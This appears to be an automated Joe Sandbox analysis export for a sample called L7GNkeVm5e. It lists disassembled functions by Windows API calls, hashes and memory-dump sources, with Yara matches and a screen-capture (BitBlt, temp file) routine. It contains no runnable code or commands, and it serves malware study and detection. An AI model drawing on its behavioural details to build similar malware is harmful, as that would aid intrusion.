• API ID: ErrorLast$EnumLocalesSystem_free
• String ID:
• API String ID: 2016158738-0
• Opcode ID: 8237f41eeff90cd2040f98b437445f2213d719484cbab9627a3f33809c66f75c
• Instruction ID: bce122d7f27e2166cc2e70cc552d18f0a706cc7974b1af7ec0077e89226bcc1d
• Opcode Fuzzy Hash: 8237f41eeff90cd2040f98b437445f2213d719484cbab9627a3f33809c66f75c
• Instruction Fuzzy Hash: 2A1129372047055FDB189F38C89167ABB93FF80358B14442DDA4687740E771AA02CB40
APIs
  • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
  • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
  • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
• GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B603,00000000,00000000,?), ref: 0043B891
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID: ErrorLast$InfoLocale_free
• String ID:
• API String ID: 787680540-0
                                                                                                                                                                                                                                                  • Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                                                                                                                                                                                  • Instruction ID: 482b5923cda5358eb0558da95ee496ac7efb878bedc9635b3893494dc5c9647c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3DF0F932910116ABDB2CAA658C057BB775CEF44714F15542AEE05A3280EB39BE4586D8
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: GetLastError.KERNEL32(?,?,0212A9DC,?,00000000,?,0212CDD6,02102474,00000000,?,00451F20), ref: 02132135
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: _free.LIBCMT ref: 02132168
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021321A9
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0213B86A,00000000,00000000,?), ref: 0213BAF8
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$InfoLocale_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 787680540-0
                                                                                                                                                                                                                                                  • Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                                                                                                                                                                                  • Instruction ID: ac25e54d84d2c883e48b44add0b7fc3bd9205c839815bb382d6b32d8d2c97cfc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30F0F932A88115ABDB395A248C09BFB776AEB4071CF054429ED49A3148FF70BF01C6D0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: GetLastError.KERNEL32(?,?,0212A9DC,?,00000000,?,0212CDD6,02102474,00000000,?,00451F20), ref: 02132135
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: _free.LIBCMT ref: 02132168
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021321A9
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: _free.LIBCMT ref: 02132190
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 0213219D
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0213B8F0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$_free$InfoLocale
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2955987475-0
                                                                                                                                                                                                                                                  • Opcode ID: a77c493685e21e679bf0160ea981175eadb5409386be25bb118e424e5fd7eabe
                                                                                                                                                                                                                                                  • Instruction ID: 185c5261f136a1328247855e92beb95b3fa9ba5ce9d183d028ba9e1b57cf14a3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a77c493685e21e679bf0160ea981175eadb5409386be25bb118e424e5fd7eabe
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7012632B852159BCB15AF34DD80ABE33AADF05720F0041BAEF02DB281EB759E05CB50
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(0043B635,00000001,?,?,004307A5,?,0043B9D6,004307A5,?,?,?,?,?,004307A5,?,?), ref: 0043B3A4
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2016158738-0
                                                                                                                                                                                                                                                  • Opcode ID: 195a4d8fd23d0ae4e4fd4f8fbfc6d5bb400bfe136b198b29952dc109111c3991
                                                                                                                                                                                                                                                  • Instruction ID: 4cae78c4b35d7b4c31765c23ce642d4c98f9d5783de0998693dc6c617ff1b9a7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 195a4d8fd23d0ae4e4fd4f8fbfc6d5bb400bfe136b198b29952dc109111c3991
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65F0C2362003045FDB149F399C92B7A7B95EF85768F15452EFE058B690D7B59C028788
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: GetLastError.KERNEL32(?,?,0212A9DC,?,00000000,?,0212CDD6,02102474,00000000,?,00451F20), ref: 02132135
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: _free.LIBCMT ref: 02132168
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021321A9
                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(0043B635,00000001,?,?,02130A0C,?,0213BC3D,02130A0C,?,?,?,?,?,02130A0C,?,?), ref: 0213B60B
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2016158738-0
                                                                                                                                                                                                                                                  • Opcode ID: e06cfec9a80bc9ac23b08667c324c5a64add62556f7a7039edbc764c084a7627
                                                                                                                                                                                                                                                  • Instruction ID: 4b1a5de7cc9b05049270bc7af0af2c86467876147d791bb0f3ae720aea2630f9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e06cfec9a80bc9ac23b08667c324c5a64add62556f7a7039edbc764c084a7627
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4F022363047041FDB165F398C80B7A7B92EF8072CF14442CFA068B680E77199028B44
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0213046A,?,00000004), ref: 0213546A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                                  • Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                                                                                                                                                                  • Instruction ID: fc3e5666a34b67115d1a5aca60a4c6b3db6977aaac8b6ae968dd79ba228a5978
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0FF09631680318BFDB165F60DC05F6E7B67EF08F12F504155FD0566190DB729920AA99
APIs
  • Part of subcall function 0042E3DD: EnterCriticalSection.KERNEL32(?,?,00431C6A,?,00457A38,00000008,00431D38,?,?,?), ref: 0042E3EC
• EnumSystemLocalesW.KERNEL32(00434D77,00000001,00457BB8,0000000C), ref: 00434DF5
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
APIs
  • Part of subcall function 0212E644: RtlEnterCriticalSection.NTDLL(01CB0DA5), ref: 0212E653
• EnumSystemLocalesW.KERNEL32(00434D77,00000001,00457BB8,0000000C), ref: 0213505C
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
APIs
  • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
  • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
  • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
• EnumSystemLocalesW.KERNEL32(0043B1C9,00000001,?,?,?,0043BA34,004307A5,?,?,?,?,?,004307A5,?,?,?), ref: 0043B2A9
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
APIs
  • Part of subcall function 02132131: GetLastError.KERNEL32(?,?,0212A9DC,?,00000000,?,0212CDD6,02102474,00000000,?,00451F20), ref: 02132135
  • Part of subcall function 02132131: _free.LIBCMT ref: 02132168
  • Part of subcall function 02132131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021321A9
• EnumSystemLocalesW.KERNEL32(0043B1C9,00000001,?,?,?,0213BC9B,02130A0C,?,?,?,?,?,02130A0C,?,?,?), ref: 0213B510
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00010662,0040FBEF), ref: 0041065B
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
APIs
• SetUnhandledExceptionFilter.KERNEL32(00410662,0210FE56), ref: 021108C2
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: fc8bcc6d872457df4fed260bc572b758efad88b86b8dd348daf776b4907b3949
                                                                                                                                                                                                                                                  • Instruction ID: cfe2422a6546bef1f61d45af2200ef59159d57cedd5e010ca0acbe3f63374a03
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc8bcc6d872457df4fed260bc572b758efad88b86b8dd348daf776b4907b3949
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0CE1A570A08616EFD714CF28C590AA6B7F1FF48304B14456EE842ABB91D738FC61DB96
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: e141dac8b757437fae1aeddb961bff7ddd32a56cbd136b19ae957eab17c051c5
                                                                                                                                                                                                                                                  • Instruction ID: 2f540896897679c785a348c8e19beffe016b2506aec9100bc0f06934009ae6dc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e141dac8b757437fae1aeddb961bff7ddd32a56cbd136b19ae957eab17c051c5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70D1A6321481B34ACB6D4A3A847403BFFE16A421A530E47ADF4F7CA5C6EB24D57ED660
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                                  • Instruction ID: 53b12877abe9f5bd80a2a3f521651de355e01c50a7045b8389fd82b7b4b17ed8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B91627230D0B34ADB294639953503FFFE15A523A139A079FE4F2CA2C5EE288965D624
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                                  • Instruction ID: b280b9e37e8ab9bab3edcdf5f8d5334b7aa2b8160c034f5d44208bea97761faf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70912B722490B34EEB6E463A847413EFEE15A422A570B079EF4F2CA1C5EF249579D630
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                                  • Instruction ID: 840c7d605cd247ab055e93d746b7d566013b7b825f8c517892cae8bc4eeb6456
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6991637230A0B34EDB694639A53403FFFE15A523A135A079FD4F2CB2C5EE1C8965D624
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                                  • Instruction ID: ec94aa79f08bd08164d2b5423dcff0ea7252bc317f1a604181e33456defd2bd9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F59119722490F34AEB6A463A857413EFEE15A522A530B079AF4F2CA1C5FF24D178D630
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                                  • Instruction ID: 65de86ff63b49bdc759aa5d57c760241c770973215aaf00ccaa693d1692859fd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A91527230D0B34ADB2D463AA47403FFFE15A523B135A079FD4F2CA2C5EE189A55D624
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                                  • Instruction ID: 88a1db33e967ba489c1d9733615a485bedb907fdea3876f4c9150ae79c9fa902
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C9172722490B30EDB6E863A857413FFFE19A421A171A079EF4F2CA1C5EF14C57AD620
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.4539762016.0000000000629000.00000040.00000020.00020000.00000000.sdmp, Offset: 00629000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_629000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• DefWindowProcW.USER32(?,00000014,?,?), ref: 0040212B
• GetClientRect.USER32(?,?), ref: 00402140
• GetDC.USER32(?), ref: 00402147
• CreateSolidBrush.GDI32(00646464), ref: 0040215A
• SelectObject.GDI32(00000000,00000000), ref: 0040216E
• CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402179
• SelectObject.GDI32(00000000,00000000), ref: 00402187
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0040219A
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021A5
• MulDiv.KERNEL32(00000008,00000000), ref: 004021AE
• CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021D2
• SelectObject.GDI32(00000000,00000000), ref: 004021E0
• SetBkMode.GDI32(?,00000001), ref: 0040225D
• SetTextColor.GDI32(?,00000000), ref: 0040226C
• _wcslen.LIBCMT ref: 00402275
Strings
Memory Dump Source
• Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
                                                                                                                                                                                                                                                  • String ID: Tahoma
                                                                                                                                                                                                                                                  • API String ID: 3832963559-3580928618
                                                                                                                                                                                                                                                  • Opcode ID: 33b9b76472e38ae72e1de4aa9982544c59de680f6868419fd236333dfe6a8388
                                                                                                                                                                                                                                                  • Instruction ID: 93c85de950fa204d17176c6e5f5269daa7db8447991b35657298edc932ea58e6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 33b9b76472e38ae72e1de4aa9982544c59de680f6868419fd236333dfe6a8388
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD710072900228AFDB22DF64DD85FAEB7BCEF09711F0041A5B609E6155DA74AF80CF54
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 004025C3
                                                                                                                                                                                                                                                  • DefWindowProcW.USER32(?,00000204,?,?), ref: 004025D5
                                                                                                                                                                                                                                                  • ReleaseCapture.USER32 ref: 004025E8
                                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 0040260F
                                                                                                                                                                                                                                                  • CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 00402696
                                                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 0040269F
                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 004026A9
                                                                                                                                                                                                                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026D7
                                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 004026E0
                                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 004026F2
                                                                                                                                                                                                                                                  • GetTempFileNameW.KERNEL32(?,hef,00000000,?), ref: 0040270D
                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00402727
                                                                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 0040272E
                                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00402735
                                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 00402743
                                                                                                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 0040274A
                                                                                                                                                                                                                                                  • SetCapture.USER32(?), ref: 00402797
                                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 004027CB
                                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 004027E1
                                                                                                                                                                                                                                                  • GetKeyState.USER32(0000001B), ref: 004027EE
                                                                                                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00402803
